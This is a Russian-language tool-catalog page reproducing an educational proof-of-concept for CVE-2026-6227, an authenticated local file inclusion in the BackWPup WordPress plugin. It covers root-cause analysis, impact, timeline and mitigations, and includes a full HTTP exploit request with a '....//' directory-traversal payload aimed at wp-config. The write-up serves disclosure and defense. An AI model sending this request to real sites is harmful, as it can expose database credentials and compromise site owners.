Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6227 — Учебный proof-of-concept для CVE-2026-6227 — аутентифицированное локальное включение файлов (Local File Inclusion) в плагине BackWPup для WordPress, включая анализ первопричины, эксплойт-запрос и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и Образование
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Учебный proof-of-concept для CVE-2026-6227 — аутентифицированное локальное включение файлов (Local File Inclusion) в плагине BackWPup для WordPress, включая анализ первопричины, эксплойт-запрос и рекомендации по смягчению последствий.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-6227: Локальное включение файлов в BackWPup

CVSS Version Researcher

Краткое описание уязвимости

Версии BackWPup до 5.6.6 включительно подвержены аутентифицированной уязвимости локального включения файлов (LFI) через параметр block_name конечной точки REST /wp-json/backwpup/v1/getblock.

Причина ошибки — нерекурсивная санитизация последовательностей обхода каталога с помощью str_replace(). Уязвимость уже устранена в версии 5.6.7.

Метаданные

  • CVE: CVE-2026-6227
  • Уровень серьёзности: Высокий
  • Оценка CVSS: 7.2
  • Затронутый продукт: плагин WordPress BackWPup
  • Затронутые версии: <= 5.6.6
  • Исправленная версия: 5.6.7
  • Статус: Исправлено
  • Дата раскрытия: 2026-04-13
  • Исследователь: Pixel_DefaultBR
  • Отказ от ответственности

    Данный репозиторий предназначен строго для образовательных целей и этических исследований в области безопасности. Приведённая здесь информация призвана помочь администраторам и командам безопасности проверить свои системы. Не используйте её против целей без явного письменного разрешения.

    Затронутая поверхность

    • Функция: BackWPupHelpers::component()
    • Конечная точка: POST /wp-json/backwpup/v1/getblock
    • Параметр: block_name
    • Уровень доступа: аутентифицированный администратор (или пользователи с делегированными правами на резервное копирование)

    Анализ первопричины

    Уязвимый загрузчик компонентов применяет нерекурсивную санитизацию с помощью str_replace() перед вызовом include(). Её можно обойти с помощью специально сформированных шаблонов обхода, таких как ....// или ..././, что позволяет злоумышленнику управлять разрешением пути.

    Воздействие

    • Включение произвольных локальных PHP-файлов из файловой системы сервера
    • Возможное раскрытие конфиденциальных данных (например, wp-config.php)
    • Возможное удалённое выполнение кода при определённых конфигурациях сервера/приложения

    По умолчанию для эксплуатации требуется доступ уровня администратора. Если права на резервное копирование делегированы, пользователи с более низкими привилегиями также могут получить возможность эксплуатировать эту уязвимость.

    Предварительные условия эксплуатации

    • Действительная аутентифицированная сессия WordPress
    • Действительный REST nonce
    • Привилегии администратора или делегированные права на резервное копирование

    Доказательство концепции

    Сценарий: локальное включение файлов

    1. Войдите в WordPress, используя учётную запись с возможностью выполнения заданий BackWPup.
    2. Выполните обычный запрос из интерфейса плагина и перехватите трафик с помощью прокси.
    3. Найдите легитимный POST-запрос к /wp-json/backwpup/v1/getblock.
    4. Замените block_name на полезную нагрузку с обходом каталога.

    Пример запроса:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. Проверьте ответ, чтобы подтвердить поведение включения файлов.

    Хронология

    • 2026-03: Уязвимость сообщена поставщику
    • 2026-03-25: Исправление выпущено поставщиком в версии 5.6.7
    • 2026-04-13: Публичное раскрытие (CVE-2026-6227)

    Меры по смягчению

    • Обновите BackWPup до версии 5.6.7 или новее
    • Ограничьте назначение возможности backwpup только доверенными ролями
    • Проверяйте журналы аудита на предмет подозрительного доступа к /wp-json/backwpup/v1/getblock

    Ссылки

    • Страница плагина поставщика: https://wordpress.org/plugins/backwpup/
    • Ссылка на CVE (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    Скачать инструмент